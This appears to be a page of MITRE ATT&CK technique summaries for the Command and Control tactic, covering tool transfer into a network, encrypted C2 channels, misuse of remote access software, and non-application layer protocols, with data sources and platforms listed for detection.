Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre